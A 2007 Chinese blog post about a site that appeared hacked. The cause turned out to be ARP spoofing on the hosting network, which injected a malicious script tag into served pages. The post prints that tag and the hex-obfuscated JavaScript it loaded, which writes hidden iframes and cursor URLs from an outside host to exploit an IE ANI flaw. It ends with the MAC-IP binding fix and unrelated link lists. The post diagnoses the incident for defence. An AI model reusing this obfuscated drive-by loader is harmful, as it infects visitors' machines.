网站被黑的假象--ARP欺骗之页面中加入一段js


Posted in Javascript onMay 16, 2007

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e");  
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1
Javascript 相关文章推荐
In Javascript Class, how to call the prototype method.(three method)
Jan 09 Javascript
javascript实用小函数使用介绍
Nov 11 Javascript
JavaScript学习笔记之基础语法
Jan 22 Javascript
EasyUI布局 高度自适应
Jun 04 Javascript
JS判断form内所有表单是否为空的简单实例
Sep 09 Javascript
Jquery EasyUI Datagrid右键菜单实现方法
Dec 30 Javascript
jquery+ajax实现省市区三级联动效果简单示例
Jan 04 Javascript
Node.js利用js-xlsx处理Excel文件的方法详解
Jul 05 Javascript
vue服务端渲染添加缓存的方法
Sep 18 Javascript
jQuery实现动态生成年月日级联下拉列表示例
May 11 jQuery
vue中的mescroll搜索运用及各种填坑处理
Oct 30 Javascript
Vue 中 filter 与 computed 的区别与用法解析
Nov 21 Javascript
javascript操作文本框readOnly
May 15 #Javascript
静态页面下用javascript操作ACCESS数据库(读增改删)的代码
May 14 #Javascript
User Scripts: Video Download by User Scripts
May 14 #Javascript
javascript之卸载鼠标事件的代码
May 14 #Javascript
getElementById在任意一款浏览器中都可以用吗的疑问回复
May 13 #Javascript
JavaScript脚本语言在网页中的简单应用
May 13 #Javascript
编辑浪子版表单验证类
May 12 #Javascript
You might like
php调整gif动画图片尺寸示例代码分享
2013/12/05 PHP
详解如何实现Laravel的服务容器的方法示例
2019/04/15 PHP
js跟随滚动条滚动浮动代码
2009/12/31 Javascript
jQuery表格行换色的三种实现方法
2011/06/27 Javascript
JQUERY实现左侧TIPS滑进滑出效果示例
2013/06/27 Javascript
JS将表单导出成EXCEL的实例代码
2013/11/11 Javascript
一个简单的JS时间控件示例代码(JS时分秒时间控件)
2013/11/22 Javascript
Javascript实现滚动图片新闻的实例代码
2013/11/27 Javascript
JavaScript继承基础讲解(原型链、借用构造函数、混合模式、原型式继承、寄生式继承、寄生组合式继承)
2014/08/16 Javascript
JS中创建函数的三种方式及区别
2016/03/13 Javascript
jQuery使用Layer弹出层插件闪退问题
2016/12/22 Javascript
Webpack打包css后z-index被重新计算的解决方法
2017/06/18 Javascript
详解vue+css3做交互特效的方法
2017/11/20 Javascript
JS实现简单随机3D骰子
2019/10/24 Javascript
微信小程序wx.navigateTo方法里的events参数使用详情及场景
2020/01/07 Javascript
Python挑选文件夹里宽大于300图片的方法
2015/03/05 Python
Python使用redis pool的一种单例实现方式
2016/04/16 Python
Python Queue模块详细介绍及实例
2016/12/27 Python
python简单实现操作Mysql数据库
2018/01/29 Python
Python操作MySQL模拟银行转账
2018/03/12 Python
python-opencv获取二值图像轮廓及中心点坐标的代码
2019/08/27 Python
python实现代码统计器
2019/09/19 Python
python从内存地址上加载python对象过程详解
2020/01/08 Python
浅谈python 中的 type(), dtype(), astype()的区别
2020/04/09 Python
开发人员所需要知道的HTML5性能分析面面观
2012/07/05 HTML / CSS
保加利亚运动鞋购物网站:SneakerStudio.bg
2020/12/23 全球购物
什么是聚集索引和非聚集索引
2012/01/17 面试题
学生实习自我鉴定
2013/10/11 职场文书
爱护花草树木的标语
2014/06/11 职场文书
2014年党员教师自我剖析材料
2014/09/30 职场文书
2014年工商所工作总结
2014/12/09 职场文书
领导欢迎词范文
2015/01/26 职场文书
举起手来观后感
2015/06/09 职场文书
体育教师研修感悟
2015/11/18 职场文书
致男子1500米运动员的广播稿
2019/11/08 职场文书
python process模块的使用简介
2021/05/14 Python